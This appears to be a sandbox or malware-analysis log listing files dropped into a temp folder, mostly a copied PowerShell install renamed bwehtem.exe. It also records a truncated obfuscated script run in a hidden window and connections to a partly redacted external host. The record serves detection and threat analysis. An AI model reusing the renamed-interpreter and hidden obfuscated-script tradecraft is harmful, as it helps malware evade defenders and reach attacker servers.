Technical Information
- '%TEMP%\o_sdan\bwehtem.exe' $aaqlzpfhxkauouzdlwehacsn_uizgvzeeu='rce;';$pgxz_ropyyotsup='ss; $pat';$dsdyeaaevtfqugpoyyy_gwtbod='}S';$wkalpkbpmyuqmaye_ydmbtaffejos_ybxlqdb_e='ve-tech';$oacj_vayeqbvjgsyyepd='honl';$uauzxsgm...
- %TEMP%\o_sdan\certificate.format.ps1xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.management.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.diagnostics.dll-help.xml
- %TEMP%\o_sdan\en-us\importallmodules.psd1
- %TEMP%\o_sdan\en-us\default.help.txt
- %TEMP%\o_sdan\en-us\about_ws-management_cmdlets.help.txt
- %TEMP%\o_sdan\en-us\about_wmi_cmdlets.help.txt
- %TEMP%\o_sdan\en-us\about_windows_powershell_ise.help.txt
- %TEMP%\o_sdan\en-us\about_windows_powershell_2.0.help.txt
- %TEMP%\o_sdan\en-us\about_wildcards.help.txt
- %TEMP%\o_sdan\en-us\about_while.help.txt
- %TEMP%\o_sdan\en-us\about_variables.help.txt
- %TEMP%\o_sdan\en-us\about_type_operators.help.txt
- %TEMP%\o_sdan\en-us\about_types.ps1xml.help.txt
- %TEMP%\o_sdan\en-us\about_try_catch_finally.help.txt
- %TEMP%\o_sdan\en-us\about_trap.help.txt
- %TEMP%\o_sdan\en-us\about_transactions.help.txt
- %TEMP%\o_sdan\en-us\about_throw.help.txt
- %TEMP%\o_sdan\en-us\about_switch.help.txt
- %TEMP%\o_sdan\en-us\about_split.help.txt
- %TEMP%\o_sdan\en-us\about_special_characters.help.txt
- %TEMP%\o_sdan\en-us\about_signing.help.txt
- %TEMP%\o_sdan\en-us\about_session_configurations.help.txt
- %TEMP%\o_sdan\en-us\about_script_internationalization.help.txt
- %TEMP%\o_sdan\en-us\about_script_blocks.help.txt
- %TEMP%\o_sdan\en-us\about_scripts.help.txt
- %TEMP%\o_sdan\en-us\about_scopes.help.txt
- %TEMP%\o_sdan\en-us\about_return.help.txt
- %TEMP%\o_sdan\en-us\about_reserved_words.help.txt
- %TEMP%\o_sdan\en-us\about_requires.help.txt
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.utility.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.consolehost.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.security.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.wsman.management.dll-help.xml
- %TEMP%\o_sdan\registry.format.ps1xml
- %TEMP%\o_sdan\pwrshsip.dll
- %TEMP%\o_sdan\pwrshmsg.dll
- %TEMP%\o_sdan\pspluginwkr.dll
- %TEMP%\o_sdan\psevents.dll
- %TEMP%\o_sdan\powershell_ise.exe
- %TEMP%\o_sdan\powershelltrace.format.ps1xml
- %TEMP%\o_sdan\powershellcore.format.ps1xml
- %TEMP%\o_sdan\powershell.exe
- %TEMP%\o_sdan\modules\troubleshootingpack\troubleshootingpack.psd1
- %TEMP%\o_sdan\modules\troubleshootingpack\troubleshootingpack.format.ps1xml
- %TEMP%\o_sdan\modules\troubleshootingpack\en-us\microsoft.windows.diagnosis.troubleshootingpack.dll-help.xml
- %TEMP%\o_sdan\modules\psdiagnostics\psdiagnostics.psm1
- %TEMP%\o_sdan\modules\psdiagnostics\psdiagnostics.psd1
- %TEMP%\o_sdan\modules\bitstransfer\en-us\microsoft.backgroundintelligenttransfer.management.dll-help.xml
- %TEMP%\o_sdan\modules\bitstransfer\microsoft.backgroundintelligenttransfer.management.interop.dll
- %TEMP%\o_sdan\modules\bitstransfer\en-us\about_bits_cmdlets.help.txt
- %TEMP%\o_sdan\modules\bitstransfer\bitstransfer.psd1
- %TEMP%\o_sdan\modules\bitstransfer\bitstransfer.format.ps1xml
- %TEMP%\o_sdan\modules\applocker\en-us\microsoft.security.applicationid.policymanagement.cmdlets.dll-help.xml
- %TEMP%\o_sdan\modules\applocker\applocker.psd1
- %TEMP%\o_sdan\help.format.ps1xml
- %TEMP%\o_sdan\getevent.types.ps1xml
- %TEMP%\o_sdan\filesystem.format.ps1xml
- %TEMP%\o_sdan\en-us\system.management.automation.dll-help.xml
- %TEMP%\o_sdan\en-us\pwrshmsg.dll.mui
- %TEMP%\o_sdan\en-us\pspluginwkr.dll.mui
- %TEMP%\o_sdan\en-us\psevents.dll.mui
- %TEMP%\o_sdan\en-us\powershell_ise.resources.dll
- %TEMP%\o_sdan\en-us\powershell.exe.mui
- %TEMP%\o_sdan\types.ps1xml
- %TEMP%\o_sdan\en-us\about_remote_troubleshooting.help.txt
- %TEMP%\o_sdan\en-us\about_remote_requirements.help.txt
- %TEMP%\o_sdan\en-us\about_remote_output.help.txt
- %TEMP%\o_sdan\en-us\about_functions_advanced_methods.help.txt
- %TEMP%\o_sdan\en-us\about_functions_advanced.help.txt
- %TEMP%\o_sdan\en-us\about_functions.help.txt
- %TEMP%\o_sdan\en-us\about_format.ps1xml.help.txt
- %TEMP%\o_sdan\en-us\about_foreach.help.txt
- %TEMP%\o_sdan\en-us\about_for.help.txt
- %TEMP%\o_sdan\en-us\about_execution_policies.help.txt
- %TEMP%\o_sdan\en-us\about_eventlogs.help.txt
- %TEMP%\o_sdan\en-us\about_escape_characters.help.txt
- %TEMP%\o_sdan\en-us\about_environment_variables.help.txt
- %TEMP%\o_sdan\en-us\about_do.help.txt
- %TEMP%\o_sdan\en-us\about_debuggers.help.txt
- %TEMP%\o_sdan\en-us\about_data_sections.help.txt
- %TEMP%\o_sdan\en-us\about_core_commands.help.txt
- %TEMP%\o_sdan\en-us\about_continue.help.txt
- %TEMP%\o_sdan\en-us\about_comparison_operators.help.txt
- %TEMP%\o_sdan\en-us\about_commonparameters.help.txt
- %TEMP%\o_sdan\en-us\about_comment_based_help.help.txt
- %TEMP%\o_sdan\en-us\about_command_syntax.help.txt
- %TEMP%\o_sdan\en-us\about_command_precedence.help.txt
- %TEMP%\o_sdan\en-us\about_break.help.txt
- %TEMP%\o_sdan\en-us\about_automatic_variables.help.txt
- %TEMP%\o_sdan\en-us\about_assignment_operators.help.txt
- %TEMP%\o_sdan\en-us\about_arrays.help.txt
- %TEMP%\o_sdan\en-us\about_arithmetic_operators.help.txt
- %TEMP%\o_sdan\en-us\about_aliases.help.txt
- %TEMP%\o_sdan\dotnettypes.format.ps1xml
- %TEMP%\o_sdan\diagnostics.format.ps1xml
- %TEMP%\o_sdan\compiledcomposition.microsoft.powershell.gpowershell.dll
- %TEMP%\o_sdan\en-us\about_functions_advanced_parameters.help.txt
- %TEMP%\o_sdan\en-us\about_functions_cmdletbindingattribute.help.txt
- %TEMP%\o_sdan\en-us\about_hash_tables.help.txt
- %TEMP%\o_sdan\en-us\about_history.help.txt
- %TEMP%\o_sdan\en-us\about_remote_faq.help.txt
- %TEMP%\o_sdan\en-us\about_remote.help.txt
- %TEMP%\o_sdan\en-us\about_regular_expressions.help.txt
- %TEMP%\o_sdan\en-us\about_ref.help.txt
- %TEMP%\o_sdan\en-us\about_redirection.help.txt
- %TEMP%\o_sdan\en-us\about_quoting_rules.help.txt
- %TEMP%\o_sdan\en-us\about_pssnapins.help.txt
- %TEMP%\o_sdan\en-us\about_pssession_details.help.txt
- %TEMP%\o_sdan\en-us\about_pssessions.help.txt
- %TEMP%\o_sdan\en-us\about_providers.help.txt
- %TEMP%\o_sdan\en-us\about_properties.help.txt
- %TEMP%\o_sdan\en-us\about_prompts.help.txt
- %TEMP%\o_sdan\en-us\about_profiles.help.txt
- %TEMP%\o_sdan\en-us\about_preference_variables.help.txt
- %TEMP%\o_sdan\en-us\about_path_syntax.help.txt
- %TEMP%\o_sdan\en-us\about_pipelines.help.txt
- %TEMP%\o_sdan\en-us\about_parsing.help.txt
- %TEMP%\o_sdan\en-us\about_parameters.help.txt
- %TEMP%\o_sdan\en-us\about_operators.help.txt
- %TEMP%\o_sdan\en-us\about_objects.help.txt
- %TEMP%\o_sdan\en-us\about_modules.help.txt
- %TEMP%\o_sdan\en-us\about_methods.help.txt
- %TEMP%\o_sdan\en-us\about_logical_operators.help.txt
- %TEMP%\o_sdan\en-us\about_locations.help.txt
- %TEMP%\o_sdan\en-us\about_line_editing.help.txt
- %TEMP%\o_sdan\en-us\about_language_keywords.help.txt
- %TEMP%\o_sdan\en-us\about_join.help.txt
- %TEMP%\o_sdan\en-us\about_job_details.help.txt
- %TEMP%\o_sdan\en-us\about_jobs.help.txt
- %TEMP%\o_sdan\en-us\about_if.help.txt
- %TEMP%\o_sdan\en-us\about_remote_jobs.help.txt
- %TEMP%\o_sdan\wsman.format.ps1xml
- %TEMP%\o_sdan\en-us\about_aliases.help.txt
- %TEMP%\o_sdan\en-us\powershell.exe.mui
- %TEMP%\o_sdan\en-us\microsoft.wsman.management.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.security.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.consolehost.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.utility.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.management.dll-help.xml
- %TEMP%\o_sdan\en-us\microsoft.powershell.commands.diagnostics.dll-help.xml
- %TEMP%\o_sdan\en-us\importallmodules.psd1
- %TEMP%\o_sdan\en-us\default.help.txt
- %TEMP%\o_sdan\en-us\about_ws-management_cmdlets.help.txt
- %TEMP%\o_sdan\en-us\about_wmi_cmdlets.help.txt
- %TEMP%\o_sdan\en-us\about_windows_powershell_ise.help.txt
- %TEMP%\o_sdan\en-us\about_windows_powershell_2.0.help.txt
- %TEMP%\o_sdan\en-us\about_wildcards.help.txt
- %TEMP%\o_sdan\en-us\about_variables.help.txt
- %TEMP%\o_sdan\en-us\psevents.dll.mui
- %TEMP%\o_sdan\en-us\about_type_operators.help.txt
- %TEMP%\o_sdan\en-us\about_types.ps1xml.help.txt
- %TEMP%\o_sdan\en-us\about_try_catch_finally.help.txt
- %TEMP%\o_sdan\en-us\about_trap.help.txt
- %TEMP%\o_sdan\en-us\about_transactions.help.txt
- %TEMP%\o_sdan\en-us\about_throw.help.txt
- %TEMP%\o_sdan\en-us\about_switch.help.txt
- %TEMP%\o_sdan\en-us\about_split.help.txt
- %TEMP%\o_sdan\en-us\about_special_characters.help.txt
- %TEMP%\o_sdan\en-us\about_signing.help.txt
- %TEMP%\o_sdan\en-us\about_session_configurations.help.txt
- %TEMP%\o_sdan\en-us\about_script_internationalization.help.txt
- %TEMP%\o_sdan\en-us\about_script_blocks.help.txt
- %TEMP%\o_sdan\en-us\about_while.help.txt
- %TEMP%\o_sdan\en-us\about_properties.help.txt
- %TEMP%\o_sdan\en-us\pspluginwkr.dll.mui
- %TEMP%\o_sdan\registry.format.ps1xml
- %TEMP%\o_sdan\pwrshsip.dll
- %TEMP%\o_sdan\pwrshmsg.dll
- %TEMP%\o_sdan\pspluginwkr.dll
- %TEMP%\o_sdan\psevents.dll
- %TEMP%\o_sdan\powershell_ise.exe
- %TEMP%\o_sdan\powershelltrace.format.ps1xml
- %TEMP%\o_sdan\powershellcore.format.ps1xml
- %TEMP%\o_sdan\help.format.ps1xml
- %TEMP%\o_sdan\getevent.types.ps1xml
- %TEMP%\o_sdan\filesystem.format.ps1xml
- %TEMP%\o_sdan\dotnettypes.format.ps1xml
- %TEMP%\o_sdan\diagnostics.format.ps1xml
- %TEMP%\o_sdan\compiledcomposition.microsoft.powershell.gpowershell.dll
- %TEMP%\o_sdan\en-us\about_scripts.help.txt
- %TEMP%\o_sdan\en-us\powershell_ise.resources.dll
- %TEMP%\o_sdan\modules\troubleshootingpack\troubleshootingpack.psd1
- %TEMP%\o_sdan\modules\troubleshootingpack\troubleshootingpack.format.ps1xml
- %TEMP%\o_sdan\modules\troubleshootingpack\en-us\microsoft.windows.diagnosis.troubleshootingpack.dll-help.xml
- %TEMP%\o_sdan\modules\psdiagnostics\psdiagnostics.psm1
- %TEMP%\o_sdan\modules\psdiagnostics\psdiagnostics.psd1
- %TEMP%\o_sdan\modules\bitstransfer\microsoft.backgroundintelligenttransfer.management.interop.dll
- %TEMP%\o_sdan\modules\bitstransfer\bitstransfer.psd1
- %TEMP%\o_sdan\modules\bitstransfer\bitstransfer.format.ps1xml
- %TEMP%\o_sdan\modules\bitstransfer\en-us\microsoft.backgroundintelligenttransfer.management.dll-help.xml
- %TEMP%\o_sdan\modules\bitstransfer\en-us\about_bits_cmdlets.help.txt
- %TEMP%\o_sdan\modules\applocker\applocker.psd1
- %TEMP%\o_sdan\modules\applocker\en-us\microsoft.security.applicationid.policymanagement.cmdlets.dll-help.xml
- %TEMP%\o_sdan\examples\profile.ps1
- %TEMP%\o_sdan\en-us\system.management.automation.dll-help.xml
- %TEMP%\o_sdan\bwehtem.exe
- %TEMP%\o_sdan\en-us\pwrshmsg.dll.mui
- %TEMP%\o_sdan\en-us\about_scopes.help.txt
- %TEMP%\o_sdan\en-us\about_return.help.txt
- %TEMP%\o_sdan\en-us\about_reserved_words.help.txt
- %TEMP%\o_sdan\en-us\about_do.help.txt
- %TEMP%\o_sdan\en-us\about_history.help.txt
- %TEMP%\o_sdan\en-us\about_hash_tables.help.txt
- %TEMP%\o_sdan\en-us\about_functions_cmdletbindingattribute.help.txt
- %TEMP%\o_sdan\en-us\about_functions_advanced_parameters.help.txt
- %TEMP%\o_sdan\en-us\about_functions_advanced_methods.help.txt
- %TEMP%\o_sdan\en-us\about_functions_advanced.help.txt
- %TEMP%\o_sdan\en-us\about_functions.help.txt
- %TEMP%\o_sdan\en-us\about_format.ps1xml.help.txt
- %TEMP%\o_sdan\en-us\about_foreach.help.txt
- %TEMP%\o_sdan\en-us\about_for.help.txt
- %TEMP%\o_sdan\en-us\about_execution_policies.help.txt
- %TEMP%\o_sdan\en-us\about_eventlogs.help.txt
- %TEMP%\o_sdan\en-us\about_escape_characters.help.txt
- %TEMP%\o_sdan\types.ps1xml
- %TEMP%\o_sdan\en-us\about_jobs.help.txt
- %TEMP%\o_sdan\en-us\about_debuggers.help.txt
- %TEMP%\o_sdan\en-us\about_data_sections.help.txt
- %TEMP%\o_sdan\en-us\about_core_commands.help.txt
- %TEMP%\o_sdan\en-us\about_continue.help.txt
- %TEMP%\o_sdan\en-us\about_comparison_operators.help.txt
- %TEMP%\o_sdan\en-us\about_commonparameters.help.txt
- %TEMP%\o_sdan\en-us\about_comment_based_help.help.txt
- %TEMP%\o_sdan\en-us\about_command_syntax.help.txt
- %TEMP%\o_sdan\en-us\about_command_precedence.help.txt
- %TEMP%\o_sdan\en-us\about_break.help.txt
- %TEMP%\o_sdan\en-us\about_automatic_variables.help.txt
- %TEMP%\o_sdan\en-us\about_assignment_operators.help.txt
- %TEMP%\o_sdan\en-us\about_arrays.help.txt
- %TEMP%\o_sdan\en-us\about_arithmetic_operators.help.txt
- %TEMP%\o_sdan\en-us\about_environment_variables.help.txt
- %TEMP%\o_sdan\certificate.format.ps1xml
- %TEMP%\o_sdan\en-us\about_job_details.help.txt
- %TEMP%\o_sdan\en-us\about_line_editing.help.txt
- %TEMP%\o_sdan\en-us\about_join.help.txt
- %TEMP%\o_sdan\en-us\about_requires.help.txt
- %TEMP%\o_sdan\en-us\about_remote_troubleshooting.help.txt
- %TEMP%\o_sdan\en-us\about_remote_requirements.help.txt
- %TEMP%\o_sdan\en-us\about_remote_output.help.txt
- %TEMP%\o_sdan\en-us\about_remote_jobs.help.txt
- %TEMP%\o_sdan\en-us\about_remote_faq.help.txt
- %TEMP%\o_sdan\en-us\about_remote.help.txt
- %TEMP%\o_sdan\en-us\about_regular_expressions.help.txt
- %TEMP%\o_sdan\en-us\about_ref.help.txt
- %TEMP%\o_sdan\en-us\about_redirection.help.txt
- %TEMP%\o_sdan\en-us\about_quoting_rules.help.txt
- %TEMP%\o_sdan\en-us\about_pssnapins.help.txt
- %TEMP%\o_sdan\en-us\about_pssession_details.help.txt
- %TEMP%\o_sdan\en-us\about_language_keywords.help.txt
- %TEMP%\o_sdan\en-us\about_pssessions.help.txt
- %TEMP%\o_sdan\en-us\about_if.help.txt
- %TEMP%\o_sdan\en-us\about_prompts.help.txt
- %TEMP%\o_sdan\en-us\about_profiles.help.txt
- %TEMP%\o_sdan\en-us\about_preference_variables.help.txt
- %TEMP%\o_sdan\en-us\about_pipelines.help.txt
- %TEMP%\o_sdan\en-us\about_path_syntax.help.txt
- %TEMP%\o_sdan\en-us\about_parsing.help.txt
- %TEMP%\o_sdan\en-us\about_parameters.help.txt
- %TEMP%\o_sdan\en-us\about_operators.help.txt
- %TEMP%\o_sdan\en-us\about_objects.help.txt
- %TEMP%\o_sdan\en-us\about_modules.help.txt
- %TEMP%\o_sdan\en-us\about_methods.help.txt
- %TEMP%\o_sdan\en-us\about_logical_operators.help.txt
- %TEMP%\o_sdan\en-us\about_locations.help.txt
- %TEMP%\o_sdan\en-us\about_providers.help.txt
- %TEMP%\o_sdan\wsman.format.ps1xml
- from %TEMP%\o_sdan\powershell.exe to %TEMP%\o_sdan\bwehtem.exe
- 'ac######techsolutions.com':443
- 'ac######techsolutions.com':443
- DNS ASK ac######techsolutions.com
- '%TEMP%\o_sdan\bwehtem.exe' $aaqlzpfhxkauouzdlwehacsn_uizgvzeeu='rce;';$pgxz_ropyyotsup='ss; $pat';$dsdyeaaevtfqugpoyyy_gwtbod='}S';$wkalpkbpmyuqmaye_ydmbtaffejos_ybxlqdb_e='ve-tech';$oacj_vayeqbvjgsyyepd='honl';$uauzxsgm...' (with hidden window)